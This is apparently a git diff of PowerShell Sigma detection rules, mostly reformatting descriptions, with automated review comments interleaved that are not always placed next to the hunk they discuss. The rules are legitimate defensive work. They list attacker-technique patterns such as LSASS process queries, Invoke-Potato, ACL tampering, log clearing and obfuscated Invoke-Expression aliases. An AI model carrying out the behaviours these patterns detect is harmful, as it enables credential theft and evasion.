b/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml index b3684cc6c..8b61c03ec 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_resolve_list_of_ip_from_file.yml 
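Review bot: The new `|` block in posh_ps_request_kerberos_ticket.yml keeps the description starting with the lowercase fragment `utilize native PowerShell Identity modules…`, which reads as an instruction rather than a rule description and is inconsistent with the `Detects …` form used by the neighbouring rules in this commit. Suggest `Detects the use of native PowerShell Identity modules to query the domain and extract the Service Principal Names for a single computer.` as the first line of the block. The detection section is outside this hunk.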
@@ -1,8 +1,7 @@ title: PowerShell Script With File Hostname Resolving Capabilities id: fbc5e92f-3044-4e73-a5c6-1c4359b539de status: experimental -description: Detects PowerShell scripts that have capabilities to read files, loop - through them and resolve DNS host entries. +description: Detects PowerShell scripts that have capabilities to read files, loop through them and resolve DNS host entries. references: - https://www.fortypoundhead.com/showcontent.asp?artid=24022 - https://labs.withsecure.com/publications/fin7-target-veeam-servers @@ -29,7 +28,6 @@ detection: - Out-File condition: ps_script and selection falsepositives: - - The same functionality can be implemented by admin scripts, correlate with name - and creator + - The same functionality can be implemented by admin scripts, correlate with name and creator level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml b/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml index 0a63468c9..c0b65ff53 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_root_certificate_installed.yml @@ -1,8 +1,7 @@ title: Root Certificate Installed - PowerShell id: 42821614-9264-4761-acfc-5772c3286f76 status: test -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md author: oscd.community, @redcanary, Zach Stanford @svch0st 
@@ -31,7 +30,6 @@ detection: - Cert:\LocalMachine\Root condition: ps_script and (1 of selection*) falsepositives: - - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need - to test if GPO push doesn't trigger FP + - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml index 03700109d..2cd0a24b7 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml @@ -1,8 +1,7 @@ title: Suspicious Invoke-Item From Mount-DiskImage id: 902cedee-0398-4e3a-8183-6f3a89773a96 status: test -description: Adversaries may abuse container files such as disk image (.iso, .vhd) - file formats to deliver malicious payloads that may not be tagged with MOTW. +description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso - https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml b/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml index 8720d0d1d..9811a92d2 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml 
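Review bot: The reflowed `falsepositives` entry still carries the author's open question `Need to test if GPO push doesn't trigger FP`; `falsepositives` is rendered to analysts as the list of known benign causes, so an untested hypothesis belongs in a YAML comment rather than in the field. Suggest `- Help Desk or IT may need to manually add a corporate Root CA on occasion.` followed by `# TODO: verify whether a GPO-pushed root CA also triggers this rule`. The selection definitions are outside this hunk.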
@@ -1,8 +1,7 @@ title: PowerShell Script With File Upload Capabilities id: d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb status: experimental -description: Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet - to send data via either "PUT" or "POST" method. +description: Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md - https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml index bda944de0..9728494e3 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_send_mailmessage.yml @@ -1,13 +1,9 @@ title: Powershell Exfiltration Over SMTP id: 9a7afa56-4762-43eb-807d-c3dc9ffe211b status: test -description: 'Adversaries may steal data by exfiltrating it over an un-encrypted network - protocol other than that of the existing command and control channel. - - The data may also be sent to an alternate network location from the main command - and control server. - - ' +description: | + Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. + The data may also be sent to an alternate network location from the main command and control server. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml index cd1d332f5..a074545ba 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -1,8 +1,8 @@ title: Powershell Sensitive File Discovery id: 7d416556-6502-45b2-9bad-9d2f05f38997 related: - - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 - type: derived + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived status: test description: Detect adversaries enumerate sensitive files references: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml index 3c39b64ec..de004eb06 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl.yml @@ -1,12 +1,12 @@ title: PowerShell Script Change Permission Via Set-Acl - PsScript id: cae80281-ef23-44c5-873b-fd48d2666f49 related: - - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived - - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 - type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived + - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High + type: derived status: experimental description: Detects PowerShell scripts set ACL to of a file or a folder references: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml index 624faf165..4015adfa1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml 
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_set_acl_susp_location.yml @@ -1,12 +1,12 @@ title: PowerShell Set-Acl On Windows Folder - PsScript id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 related: - - id: cae80281-ef23-44c5-873b-fd48d2666f49 - type: derived - - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 - type: derived - - id: bdeb2cff-af74-4094-8426-724dc937f20a - type: derived + - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low + type: derived + - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp + type: derived + - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low + type: derived status: experimental description: Detects PowerShell scripts to set the ACL to a file in the Windows folder references: @@ -32,6 +32,7 @@ detection: - 'Set-Acl ' - '-AclObject ' selection_paths: + # Note: Add more suspicious paths ScriptBlockText|contains: - -Path "C:\Windows - -Path "C:/Windows @@ -43,6 +44,7 @@ detection: - -Path "$env:windir - -Path '$env:windir selection_permissions: + # Note: Add more suspicious permissions ScriptBlockText|contains: - FullControl - Allow diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml b/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml index d4bef5903..3e0266cf0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml 
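Review bot: The two added comments `# Note: Add more suspicious paths` and `# Note: Add more suspicious permissions` are open-ended TODOs inside `selection_paths` and `selection_permissions` that do not say what is known to be missing, so they will either be ignored or prompt ad-hoc additions without review. Either record the candidates that were considered and deferred, or reference the tracking item, e.g. `# TODO(<tracking-id>): list candidate paths/permissions considered and why they were deferred`. The `selection_paths` list is cut by the gap between the two hunks, so the full set of path variants is not visible here.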
@@ -1,15 +1,14 @@ title: Change PowerShell Policies to an Insecure Level - PowerShell id: 61d0475c-173f-4844-86f7-f3eebae1c66b related: - - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f - type: similar - - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 - type: similar - - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 - type: similar + - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry + type: similar + - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet + type: similar + - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry + type: similar status: test -description: Detects changing the PowerShell script execution policy to a potentially - insecure level using the "Set-ExecutionPolicy" cmdlet. +description: Detects changing the PowerShell script execution policy to a potentially insecure level using the "Set-ExecutionPolicy" cmdlet. references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1 - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml index 102c254be..b19b3c6f1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml @@ -24,6 +24,7 @@ detection: ScriptBlockText|contains: - Invoke-SMBAutoBrute - Invoke-GPOLinks + # - 'Out-Minidump' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-Potato condition: ps_script and selection falsepositives: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml b/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml index 7d18396bb..5e2356204 100644 
--- a/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_software_discovery.yml @@ -1,12 +1,10 @@ title: Detected Windows Software Discovery - PowerShell id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 status: test -description: Adversaries may attempt to enumerate software for a variety of reasons, - such as figuring out what security measures are present or if the compromised - system has a version of software that is vulnerable. +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md - - https://github.com/harleyQu1nn/AggressorScripts + - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna author: Nikita Nazarov, oscd.community date: 2020/10/16 modified: 2022/12/02 @@ -25,6 +23,7 @@ detection: - PowerShellCore/Operational selection: ScriptBlockText|contains|all: + # Example: Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize - get-itemProperty - \software\ - select-object diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml index 87605949d..6b6343645 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ace_tampering.yml 
@@ -1,9 +1,7 @@ title: Potential Persistence Via Security Descriptors - ScriptBlock id: 2f77047c-e6e9-4c11-b088-a3de399524cd status: test -description: Detects usage of certain functions and keywords that are used to manipulate - security descriptors in order to potentially set a backdoor. As seen used in the - DAMP project. +description: Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project. references: - https://github.com/HarmJ0y/DAMP author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml index ed6caeb36..211001d1a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml @@ -1,15 +1,10 @@ title: AD Groups Or Users Enumeration Using PowerShell - ScriptBlock id: 88f0884b-331d-403d-a3a1-b668cf035603 status: test -description: 'Adversaries may attempt to find domain-level groups and permission settings. - - The knowledge of domain-level permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as domain administrators. - - ' +description: | + Adversaries may attempt to find domain-level groups and permission settings. + The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as domain administrators. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml index 5cd17ea97..10ad276e0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml @@ -1,11 +1,10 @@ title: Potential PowerShell Obfuscation Using Character Join id: e8314f79-564d-4f79-bc13-fbc0bf2660d8 related: - - id: 96cd126d-f970-49c4-848a-da3a09f55c55 - type: derived + - id: 96cd126d-f970-49c4-848a-da3a09f55c55 + type: derived status: test -description: Detects specific techniques often seen used inside of PowerShell scripts - to obfscuate Alias creation +description: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -26,8 +25,11 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: + # Example: + # Set-Alias -Name Y -Value (-join("Ne","w-O","bje","ct")) + # Set-Alias -Name X -Value (-join("Inv","oke","-","Exp","ression")) ScriptBlockText|contains|all: - - -Alias + - -Alias # For both "New-Alias" and "Set-Alias" - ' -Value (-join(' condition: ps_script and selection falsepositives: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml index db9a0c91d..412cbdd91 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml 
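Review bot: The reflowed description keeps the typo `obfscuate` (`to obfscuate Alias creation`); since the line is rewritten, suggest `description: Detects specific techniques often seen used inside of PowerShell scripts to obfuscate Alias creation`. The new comment on `-Alias` (`# For both "New-Alias" and "Set-Alias"`) understates the match: `contains` on `-Alias` also hits `Get-Alias`, `Remove-Alias`, `Import-Alias` and the `-Alias` parameter, and it is the second `|all` term `' -Value (-join('` that narrows the hit, so `# Matches any *-Alias cmdlet; the -Value (-join( term below is what restricts this to alias creation via joined strings` would be more accurate. The `falsepositives` entries follow outside this hunk.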
@@ -1,11 +1,10 @@ title: Suspicious Eventlog Clear id: 0f017df3-8f5a-414f-ad6b-24aff1128278 related: - - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 - type: derived + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived status: test -description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to - clear the Windows event logs +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs references: - https://twitter.com/oroneequalsone/status/1568432028361830402 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md @@ -33,8 +32,6 @@ detection: - 'Clear-WinEvent ' condition: ps_script and selection falsepositives: - - Rare need to clear logs before doing something. Sometimes used by installers - or cleaner scripts. The script should be investigated to determine if it's - legitimate + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml index 1058aae8d..2c5a33b74 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_directory_enum.yml 
@@ -1,8 +1,7 @@
 title: Powershell Directory Enumeration
 id: 162e69a7-7981-4344-84a9-0f1c9a217a52
 status: test
-description: Detects technique used by MAZE ransomware to enumerate directories using
- Powershell
+description: Detects technique used by MAZE ransomware to enumerate directories using Powershell
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
 - https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml
index 6b8306375..b6ec0f945 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_download.yml
@@ -1,8 +1,8 @@
 title: Suspicious PowerShell Download - Powershell Script
 id: 403c2cc0-7f6b-4925-9423-bfa573bed7eb
 related:
- - id: 65531a81-a694-4e31-ae04-f8ba5bc33759
- type: derived
+ - id: 65531a81-a694-4e31-ae04-f8ba5bc33759
+ type: derived
 status: test
 description: Detects suspicious PowerShell download command
 author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml
index 1c9cbc9a6..799109e43 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml
@@ -1,22 +1,12 @@
 title: Powershell Execute Batch Script
 id: b5522a23-82da-44e5-9c8b-e10ed8955f88
 status: test
-description: 'Adversaries may abuse the Windows command shell for execution.
-
- The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is
- the primary command prompt on Windows systems.
-
- The Windows command prompt can be used to control almost any aspect of a system,
- with various permission levels required for different subsets of commands.
-
- Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential
- commands to run, as well as normal scripting operations such as conditionals and
- loops.
-
- Common uses of batch files include long or repetitive tasks, or the need to run
- the same set of commands on multiple system
-
- '
+description: |
+ Adversaries may abuse the Windows command shell for execution.
+ The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.
+ The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.
+ Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.
+ Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml
index a6ac96f1c..52062e7f8 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_extracting.yml
@@ -1,16 +1,10 @@
 title: Extracting Information with PowerShell
 id: bd5971a7-626d-46ab-8176-ed643f694f68
 status: test
-description: 'Adversaries may search local file systems and remote file shares for
- files containing insecurely stored credentials.
-
- These can be files created by users to store their own credentials, shared credential
- stores for a group of individuals,
-
- configuration files containing passwords for a system or service, or source code/binary
- files containing embedded passwords.
-
- '
+description: |
+ Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.
+ These can be files created by users to store their own credentials, shared credential stores for a group of individuals,
+ configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
 author: frack113
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml
index 609d35e65..9eb9afdab 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_follina_execution.yml
@@ -1,8 +1,7 @@
 title: Troubleshooting Pack Cmdlet Execution
 id: 03409c93-a7c7-49ba-9a4c-a00badf2a153
 status: test
-description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190
- or action similar to "msdt" lolbin (as described in LOLBAS)
+description: Detects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)
 references:
 - https://twitter.com/nas_bench/status/1537919885031772161
 - https://lolbas-project.github.io/lolbas/Binaries/Msdt/
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml
index cf3132fb0..185da178c 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml
@@ -1,8 +1,7 @@
 title: Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy
 id: bbb9495b-58fc-4016-b9df-9a3a1b67ca82
 status: test
-description: Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy
- is used to get the default password policy for an Active Directory domain.
+description: Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy
 - https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml
index 18e5b4df9..31adfc90d 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml
@@ -1,8 +1,7 @@
 title: PowerShell Get-Process LSASS in ScriptBlock
 id: 84c174ab-d3ef-481f-9c86-a50d0b8e3edb
 status: test
-description: Detects a Get-Process command on lsass process, which is in almost all
- cases a sign of malicious activity
+description: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
 references:
 - https://twitter.com/PythonResponder/status/1385064506049630211
 author: Florian Roth (Nextron Systems)
@@ -25,7 +24,6 @@ detection:
 ScriptBlockText|contains: Get-Process lsass
 condition: ps_script and selection
 falsepositives:
- - Legitimate certificate exports invoked by administrators or users (depends on
- processes in the environment - filter if unusable)
+ - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)
 level: high
 ruletype: Sigma
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml
index 434751214..44e8afc2f 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml
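Review bot: The rewrapped `falsepositives` entry on the new side still reads `Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)`, which does not describe a `Get-Process lsass` detection and looks copied from a certificate-export rule. Since the commit rewrites this line anyway, it would be the moment to replace it with an entry that matches the selector, e.g. `- Administrative or monitoring scripts that query the LSASS process by name (filter if seen in the environment)`. The `detection` block that `ScriptBlockText|contains: Get-Process lsass` belongs to begins outside this hunk.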
@@ -1,8 +1,7 @@
 title: Suspicious Hyper-V Cmdlets
 id: 42d36aa1-3240-4db0-8257-e0118dcdd9cd
 status: test
-description: Adversaries may carry out malicious operations using a virtual instance
- to avoid detection
+description: Adversaries may carry out malicious operations using a virtual instance to avoid detection
 references:
 - https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml
index e95b761af..82ca53a72 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_generic.yml
@@ -1,10 +1,10 @@
 title: Suspicious PowerShell Invocations - Generic
 id: ed965133-513f-41d9-a441-e38076a0798f
 related:
- - id: 3d304fda-78aa-43ed-975c-d740798a49c1
- type: derived
- - id: bbb80e91-5746-4fbe-8898-122e2cafdbf4
- type: similar
+ - id: 3d304fda-78aa-43ed-975c-d740798a49c1
+ type: derived
+ - id: bbb80e91-5746-4fbe-8898-122e2cafdbf4
+ type: similar
 status: test
 description: Detects suspicious PowerShell invocation command parameters
 author: Florian Roth (Nextron Systems)
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml
index 7ddc467bb..5a790af0a 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invocation_specific.yml
@@ -1,12 +1,12 @@
 title: Suspicious PowerShell Invocations - Specific
 id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71
 related:
- - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
- type: derived
- - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090
- type: similar
- - id: 536e2947-3729-478c-9903-745aaffe60d2
- type: similar
+ - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
+ type: derived
+ - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090
+ type: similar
+ - id: 536e2947-3729-478c-9903-745aaffe60d2
+ type: similar
 status: test
 description: Detects suspicious PowerShell invocation command parameters
 author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml
index e9e7ea43d..075c3bf3a 100644
--- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml
@@ -1,14 +1,9 @@
 title: Change User Agents with WebRequest
 id: d4488827-73af-4f8d-9244-7b7662ef046e
 status: test
-description: 'Adversaries may communicate using application layer protocols associated
- with web traffic to avoid detection/network filtering by blending in with existing
- traffic.
-
- Commands to the remote system, and often the results of those commands, will be
- embedded within the protocol traffic between the client and server.
-
- '
+description: |
+ Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.
+ Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
 references:
